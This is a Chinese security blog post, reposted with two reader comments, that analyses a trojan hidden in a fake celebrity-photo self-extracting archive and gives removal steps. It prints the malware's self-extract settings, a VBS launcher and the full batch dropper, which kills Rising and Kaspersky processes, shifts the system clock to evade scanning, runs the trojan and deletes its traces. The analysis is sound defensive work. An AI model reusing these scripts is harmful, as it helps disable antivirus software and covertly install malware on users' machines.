安全实例：遭遇“艳照门”木马

 

虚拟机系统：windows xp2 

　　下载软件：迅雷

　　杀毒软件：瑞星2008(打了最新补丁包)

　　一、中招过程

　　朋友好奇，寻找艳照门图片。在百度某贴吧中看到一条信息，提供艳照下载，并且给出了链接地址“http://guilin123.*.com/yanmenzhao.rar”于是迫不及待地用迅雷下载，下载的过程中“迅雷安全中心”弹出病毒威胁警告对话框，由于是测试忽略，点击“继续下载”。(图1)

　　

　　为了测试，笔者的迅雷设置了“下载完成后杀毒”。下载完成后，瑞星病毒扫描后提示“发现2个病毒，清除失败!”(图2)

　　

　　二、病毒分析

　　下载完成的这个名称为yanmenzhao，大小为1.04M文件是个压缩文件，后缀为rar。右键单击选择“解压到yanmenzhao下”，解压后为yanmenzhao.exe，其后缀为exe，这是个自动解压文件，估计攻击者一定在其中做了文章。(图3)

　　

这时千万不能直接双击打开，打开后一定会运行自解压脚本就会中招。先打开WinRAR压缩软件，然后通过“文件”→“打开压缩文件”来打开yuanmenzhao.exe，果然在其下有两个文件：艳门照.rar、ymz.exe。第一个文件应该就是图片压缩包，而第二个就是木马压缩文件。同时在WinRAR的右侧窗格中发现如下代码：(图4)

　　

      Path=%systemroot%
　　Setup=ymz.exe
　　Presetup=艳门照.rar
　　Silent=1
　　Overwrite=1

　　解释如下：

　　第一行是文件的解压路径，在系统根目录下;

　　第二页是解压后自动运行ymz.exe;

　　第三行是在解压之前先解压艳门照.rar，达到掩人耳目，看不到ymz.exe文件，其实它已经运行了;

　　第四行是隐藏文件，达到更隐蔽;

　　第五行是覆盖目录下的同名文件，以容错更可靠。

　　用同样的方法在WinRAR中解压ymz.exe，发现下面5个文件：(图5)

　　

      1.bat
　　1.exe
　　1.vbs
　　knlps.exe
　　knlps.sys

　　同样在右边有自解压脚本代码：

      Path=%systemroot%\temp
　　SavePath
　　Setup=1.vbs
　　Silent=1
　　Overwrite=1

　　原理好上面的一样，只不过是解压到系统临时目录下。

　　用记事本打开1.vbs分析，代码如下：

     CreateObject("WScript.Shell").Run "cmd /c 1.bat",0

　　很明显，是调用1.bat文件。

　　用记事本打开1.bat文件，代码及其解释如下：

      @ECHO OFF
　　knlps.exe -l >PID.txt
　　FINDSTR /i "RavMon.exe" PID.TXT >>RAV.txt
　　FINDSTR /i "RavMonD.exe" PID.TXT >>RAV.txt
　　FINDSTR /i "CCenter.exe" PID.TXT >>RAV.txt
　　FOR /F "eol=; tokens=1 delims= " %%1 in (RAV.txt) do knlps.exe -k %%1

　　上述代码是获取瑞星组件的进程ID并通过knlps.exe结束瑞星的进程。

      set date=%date%
　　date 1990-01-01
　　date 1990-01-01

　　上述代码是修改系统时间使卡巴监控失效，这句是关键破卡巴查杀的程序流，没这句被杀木马就会被杀。

      @echo off & setlocal enableextensions
　　echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
　　set /a i = 15
　　:Timeout
　　if %i% == 0 goto Next
　　setlocal
　　set /a i = %i% - 1
　　cscript //nologo %temp%.\tmp$$$.vbs
　　goto Timeout
　　goto End

　　上述代码是倒计时等待15秒

　　:Next

　　%systemroot%\temp\1.exe 这个是你木马的名称

　　for %%f in (%temp%.\tmp$$$.vbs*) do del %%f

　　上述代码第二回行就木马名称的解压目录，第三行行是倒计时等待结束后运行木马并删除。

      date 2007-10-27 aaa
　　date %date% aaa

　　上述代码是恢复系统时间(卡巴监控)

     RD /S /Q %systemroot%\temp\

　　上述代码的含义是删除临时文件清除痕迹。

　　从上面的分析可以看出该自解压包木马的运行机制是，先通过脚本终结瑞星和卡巴斯基，然后运行真正的木马程序，即1.exe，最后清除痕迹。

三、运行病毒

　　1、瑞星被终结

　　分析完毕，然后双击yanmenzhao.exe看看中毒症状。为了分析病毒的运行状况，事先打开了瑞星的“实时监控”和“任务管理器”，以观察病毒运行状态。运行后瑞星没有任何提示，任务栏中的瑞星实时监控图标消失，看来瑞星被终结了。另外，在任务管理中出现了一个cscript.exe进程见图6，很快地闪动，鼠标无法选择结束，大概几秒钟后该进程消失，在进程管理器中有多了2个svchost.exe进程见图7。(笔者在测试前备份了进程表，以前的为5个，多了2个)(图6)(图7)

　　

　　

　　2、可疑的网络连接

　　在命令提示符下敲入命令：

     netstat -ano

　　查看网络端口连接情况，果然发现了两个可疑IP地址的端口连接：(图8)

　　

      TCP 192.168.131.72:1098 116.20.215.181:8008 ESTABLISHED 1916
　　TCP 192.168.131.72:1099 116.20.215.181:2630 ESTABLISHED 424

　　这两个连接正好是刚才创建的两个svchost.exe进程创建的。其中的IP 116.20.215.181应该是攻击者的IP或者是一个中转IP。打开www.ip138.com查询，得知是广东省佛山市电信。(图9)

　　

四、清除病毒

　　1、结束进程

　　在结束进程的发现这两个svchost.exe进程之间互相保护，当结束了其中的一个，另一个马上会重新新建一个。因此手工结束速度太慢，通过批处理命令来清除：

　　把如下代码保存为kill.bat，双击即可。

      @echo off
　　taskkill /f /pid 1916
　　taskkill /f /pid 424
　　exit

　　提示：其中的pid是随机的，一定要找到可疑的svchost.exe进程的pid，如果结束了系统启动的svchost.exe的话，系统就会关机或者重启。确定的方法，可以参考图8。

　　2、删除服务

　　运行services.msc打开“服务”工具，通过分析发现了一个可疑的服务项。

　　服务名称为：Workstain

　　显示名称：qmijiu

　　描述：Wicrosoft .NET Framework TPM

　　可执行文件路径：c:\WINDOWS\system32\svchost.exe -k Workstain

　　启动类型:自动

　　服务状态：已启动

　　评析：该服务项和Workstation非常相似，并且描述极具欺骗性，攻击者非常狡猾。(图10)

　　

　　提示：在禁用服务的过程中发现，如果不先结束两个svchost.exe进程，发现根本无法禁用，当你选择禁用该服务，点击确定，它马上改为“自动”运行，可见这也是进程保护在作怪。因此必须把两个进程结束掉再禁止服务。最彻底的是用命令把该服务删除，命令为：　

    sc delete qmijiu

　　3、文件删除

　　(1)C:\WINDOWS目录下的(图11)

　　

　　艳门照.rar

　　ymz.exe

　　(1)C:\WINDOWS\system32目录下的(图12)

　　

　　Workstain.drv

　　Sharing.dll

　　总结：该木马病毒利用大众的猎奇心理，把木马和图片打包在一起，然后通过WinRAR的自解压功能使得木马得以运行。其原理比较简单，但象朋友这样的人却屡屡中招。这例“艳照门”木马病毒给我们的启示是：

      1、做好自律，不去猎奇浏览不雅的东西;

      2、在系统中要设置显示文件的后缀，这样可以通过文件后缀就可以判断文件的类型。

   3、对自解压文件要非常小心，千万不要直接打开，应该选择用winRAR软件打开，看看有没有可疑的脚本和程序。总之，在思想上和技术上都做好准备，不要成为“艳照门”木马病毒的下一个受害者。

 

 

 

 文章来源：http://security.ctocio.com.cn/tips/348/7814348.shtml

评论

2 楼 lordhong 2008-03-04  

学到很多东西，谢谢！特别是如何删除两个互相保护的process。。。

1 楼 BEA 2008-03-03  

我没有看这些东西
但开了个自己的网站
用自己的 pc做服务器
这段时间老中病毒
昨天一天时间我重装了俩次系统
真是的
这种日子何时是个头呀!

我想最好世界上有一部专门针对计算机病毒的法律那该有多好呀!
最好加上社会保障
当中病毒了能得到相应的补偿